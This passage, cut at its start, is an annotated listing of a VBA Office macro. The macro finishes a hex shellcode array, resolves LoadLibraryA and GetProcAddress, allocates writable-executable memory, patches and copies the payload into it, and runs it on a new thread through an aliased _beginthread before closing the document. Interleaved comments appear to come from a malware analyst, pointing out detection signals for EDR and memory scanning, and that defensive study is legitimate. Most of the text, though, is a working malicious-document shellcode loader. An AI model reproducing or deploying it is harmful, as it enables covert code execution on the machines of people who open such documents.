  41. &HC7, &H44, &H24, &H30, &H0, &H0, &H0, &H0, &HC7, &H44, &H24, &H28, &H0, &H0, &H0, &H0, &HC7, &H44, &H24, &H20, &H0, &H0, &H0, &H0, &H45, &H33, &HC9, &H45, &H33, &HC0, &H48, &H8D, &H94, &H24, &HE0, &H1, &H0, &H0, &H33, &HC9, &HFF, &H94, &H24, &H68, &H3, &H0, &H0, &H48, &HC7, &H44, &H24, &H20, &H0, &H0, &H0, &H0, &H45, &H33, &HC9, &H4C, &H8D, &H84, &H24, &H90, &H0, &H0, &H0, &H48, &H8D, &H94, &H24, &H10, &H3, &H0, &H0, &H33, &HC9, &HFF, &H54, &H24, &H68, &H89, &H84, &H24, &HD0, &H3, &H0, &H0, &H83, &HBC, &H24, &HD0, &H3, &H0, &H0, &H0, &H7C, &H55, &HC6, &H84, &H24, &HC0, &H4, &H0, &H0, &H6F, &HC6, &H84, &H24, &HC1, &H4, &H0, &H0, &H70, &HC6, &H84, &H24, &HC2, &H4, &H0, &H0, &H65, &HC6, &H84, &H24, &HC3, &H4, &H0, &H0, &H6E, &HC6, &H84, &H24, &HC4, &H4, &H0, &H0, _
  42. &H0, &HC7, &H44, &H24, &H28, &H1, &H0, &H0, &H0, &H48, &HC7, &H44, &H24, &H20, &H0, &H0, &H0, &H0, &H45, &H33, &HC9, &H4C, &H8D, &H84, &H24, &H90, &H0, &H0, &H0, &H48, &H8D, &H94, &H24, &HC0, &H4, &H0, &H0, &H33, &HC9, &HFF, &H94, &H24, &HC0, &H3, &H0, &H0, &H48, &H8D, &H8C, &H24, &HC8, &H1, &H0, &H0, &HFF, &H94, &H24, &H80, &H0, &H0, &H0, &H48, &H8D, &H8C, &H24, &HB0, &H3, &H0, &H0, &HFF, &H94, &H24, &H80, &H0, &H0, &H0, &H48, &H8D, &H4C, &H24, &H70, &HFF, &H94, &H24, &H80, &H0, &H0, &H0, &H48, &H8D, &H8C, &H24, &H20, &H4, &H0, &H0, &HFF, &H94, &H24, &H80, &H0, &H0, &H0, &H48, &H81, &HC4, &HD8, &H4, &H0, &H0, &HC3, &HCC, &HCC)
  43. '``````````````````````````````````````````````````````````````````````````````````
      ' Look up, inside the Office process, the current addresses of LoadLibraryA and
      ' GetProcAddress. They are later written into the payload bytes, so the payload
      ' can resolve every other API by name at run time.
  44. Dim kernel32 As LongPtr, addr_LoadLibraryA As LongPtr, addr_GetProcAddr As LongPtr
      ' rising_sun is assigned but never read anywhere in this listing.
  45. Dim rising_sun As String
  46. rising_sun = "kernel32"
  47. kernel32 = LoadLibraryA("kernel32")
  48. addr_LoadLibraryA = GetProcAddress(kernel32, "LoadLibraryA")
  49. addr_GetProcAddr = GetProcAddress(kernel32, "GetProcAddress")
      ' 1265 and 1283 are the same numbers used as literal binbuffer indices in the
      ' two pointer-patching RtlMoveMemory calls further down; these two variables
      ' themselves are not read in this listing.
  50. Dim twefasfg As Long, rgggsdfa As Long
  51. twefasfg = 1265
  52. rgggsdfa = 1283
  53. '``````````````````````````````````````````````````````````````````````````````````
  54. Dim eIndex1 As Long, eIndex2 As Long, eValue As Long
  55. Dim vAddress As LongPtr, Result As LongPtr
      ' Reserve the memory the payload will run from: 3224 bytes, &H1000 = MEM_COMMIT,
      ' &H40 = PAGE_EXECUTE_READWRITE. A writable-and-executable private region inside
      ' an Office process is a useful memory-scanning and EDR signal.
  56. vAddress = VirtualAlloc(0, 3224, &H1000, &H40)
      ' Reset so it can serve as the write index into binbuffer in the loop below.
  57. size_count = 0
  58. '``````````````````````````````````````````````````````````````````````````````````
      ' Concatenate the Array() chunks, in order, into the flat Byte buffer binbuffer.
      ' When the loop finishes size_count holds the total number of payload bytes.
  59. For eIndex1 = 0 To BlockCount - 1
  60. For eIndex2 = 0 To UBound(shellcode(eIndex1))
      ' Each Variant element is one byte value written as a &H.. literal.
  61. eValue = shellcode(eIndex1)(eIndex2)
  62. binbuffer(size_count) = eValue
  63. size_count = size_count + 1
  64. Next eIndex2
  65. Next eIndex1
  66. '``````````````````````````````````````````````````````````````````````````````````
      ' Patch the staged payload: write 8 bytes of each resolved address into
      ' binbuffer at offsets 1265 and 1283. Because src is declared ByRef As Any, the
      ' bytes copied are the value stored in the LongPtr variable, i.e. the address.
      ' NOTE(review): the 8-byte length matches LongPtr on 64-bit Office only, which
      ' fits the x64 payload.
  67. Result = RtlMoveMemory(VarPtr(binbuffer(1265)), addr_LoadLibraryA, 8)
  68. Result = RtlMoveMemory(VarPtr(binbuffer(1283)), addr_GetProcAddr, 8)
  69.  
  70. '``````````````````````````````````````````````````````````````````````````````````
      ' Copy the patched payload, one byte per call, from binbuffer into the region
      ' returned by VirtualAlloc.
  71. For eIndex1 = 0 To size_count - 1
  72. eValue = binbuffer(eIndex1)
      ' eValue is a Long passed ByRef with dlen = 1, so only its first (low-order)
      ' byte is copied.
  73. Result = RtlMoveMemory(vAddress + eIndex1, eValue, 1)
  74. Next eIndex1
  75. Dim LMCooperator As Long
      ' Execution point: SharpShooter is the alias for msvcrt!_beginthread, so this
      ' starts a new thread in the Office process at the first payload byte. The thread
      ' has no backing module on disk, which is what in-memory detections key on.
  76. LMCooperator = SharpShooter(vAddress, 0, 0)
      ' The document is closed right after the thread is started.
  77. ThisDocument.Close
  78. Exit Sub
      ' Error target set by On Error GoTo at the top of the Sub: nothing is logged or
      ' shown, the macro simply ends.
  79. LoneSpirit:
  80. End Sub